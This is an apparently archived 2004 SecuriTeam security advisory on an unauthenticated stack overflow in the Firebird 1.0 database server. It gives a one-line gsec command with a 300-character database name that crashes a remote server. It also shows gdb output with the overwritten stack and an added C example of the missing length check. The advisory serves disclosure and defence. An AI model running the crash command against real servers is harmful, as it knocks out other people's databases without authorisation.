[UNIX] Firebird Database Remote Database Name Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 05/23/04

    To: list@securiteam.com
    Date: 23 May 2004 14:57:13 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Firebird Database Remote Database Name Overflow
    ------------------------------------------------------------------------

    SUMMARY

    Firebird <http://firebird.sourceforge.net/> is "a relational database
    offering many ANSI SQL-92 features that runs on Linux, Windows, and a
    variety of Unix platforms. Firebird offers excellent concurrency, high
    performance, and powerful language support for stored procedures and
    triggers. It has been used in production systems, under a variety of names
    since 1981".

    A vulnerability in the way Firebird Database handles database names
    allows an unauthenticated user to crash the server and overwrite a
    critical section of the stack used by the database.

    DETAILS

    Vulnerable Systems:
     * Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable

    Immune Systems:
     * Firebird Database version 1.5.0 (others are presumed to be immune as
    well)

    Issuing the following command against a remote server:
    gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever -password whatever

    crashes the server process, as can be seen when it is run under gdb:
    gdb /usr/lib/firebird/bin/ibserver
    GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is
    free software, covered by the GNU General Public
    License, and you are welcome to change it and/or distribute copies of it
    under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for
    details.
    This GDB was configured as "i386-linux"...(no debugging symbols
    found)...Using host libthread_db library
    "/lib/tls/libthread_db.so.1".

    (gdb) r
    Starting program: /usr/lib/firebird/bin/ibserver
    (no debugging symbols found)...(no debugging symbols
    found)...(no debugging symbols found)...(no debugging
    symbols found)...(no debugging symbols found)...[Thread
    debugging using libthread_db enabled]
    [New Thread 1075462272 (LWP 31389)]
    (no debugging symbols found)...(no debugging symbols
    found)...(no debugging symbols found)...(no debugging
    symbols found)...(no debugging symbols found)...[New
    Thread 1092549552 (LWP 31392)]
    [New Thread 1100938160 (LWP 31393)]
    [Thread 1100938160 (LWP 31393) exited]
    [Thread 1092549552 (LWP 31392) exited]
    [New Thread 1092549552 (LWP 31396)]

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 1092549552 (LWP 31396)]
    0x08132223 in ERR_post ()

    (gdb) bt
    #0 0x08132223 in ERR_post ()
    #1 0x080942ac in THD_wlck_unlock ()
    #2 0x41414141 in ?? ()
    #3 0x41414141 in ?? ()
    #4 0x41414141 in ?? ()
    #5 0x41414141 in ?? ()
    #6 0x41414141 in ?? ()
    #7 0x41414141 in ?? ()
    #8 0x00414141 in ?? ()
    #9 0x0000012c in ?? ()
    ..

    Solution:
    Debian is currently not maintaining this version of the product, so it is
    recommended that you use a source code based installation.
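
    The missing check, as an added example (not code from the advisory or from
    Firebird): a "host:database" spec like the one passed to gsec above is split
    and the database name is length-checked before it reaches a fixed-size
    buffer. DB_NAME_MAX, parse_db_spec and check_constructed_spec are
    hypothetical names, and the 256-byte buffer size is an assumption.

```c
/* Added illustration, not Firebird source. DB_NAME_MAX and both function
 * names are hypothetical; the 256-byte buffer size is an assumption. */
#include <stdio.h>
#include <string.h>

#define DB_NAME_MAX 256   /* assumed size of the fixed name buffer */

/* Split "host:database" at the first colon and copy the database part into
 * out[out_len]. Returns 0 on success, -1 if the spec is malformed or the
 * name does not fit. An unchecked strcpy(out, name) at the copy step is the
 * pattern that lets an over-long name run past the buffer onto the stack. */
int parse_db_spec(const char *spec, char *out, size_t out_len)
{
    const char *colon, *name;
    size_t n;

    if (spec == NULL || out == NULL || out_len == 0)
        return -1;
    colon = strchr(spec, ':');
    name = colon ? colon + 1 : spec;   /* no host part: whole spec is the name */
    n = strlen(name);
    if (n == 0 || n >= out_len)        /* reject; never truncate or overflow */
        return -1;
    memcpy(out, name, n + 1);          /* n + 1 also copies the NUL */
    return 0;
}

/* Build a constructed spec, "192.168.1.52:" followed by name_len 'A' bytes
 * (the shape of the request in the advisory), and return the verdict. */
int check_constructed_spec(size_t name_len)
{
    char spec[1024] = "192.168.1.52:";
    char name[DB_NAME_MAX];
    size_t host_len = strlen(spec);

    if (host_len + name_len >= sizeof spec)
        return -1;
    memset(spec + host_len, 'A', name_len);
    spec[host_len + name_len] = '\0';
    return parse_db_spec(spec, name, sizeof name);
}

int main(void)
{
    printf("255-byte name: %d\n", check_constructed_spec(255));
    printf("300-byte name: %d\n", check_constructed_spec(300));
    return 0;
}
```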

    ADDITIONAL INFORMATION

    The information has been provided by Noam Rathaus
    <mailto:expert@securiteam.com>.
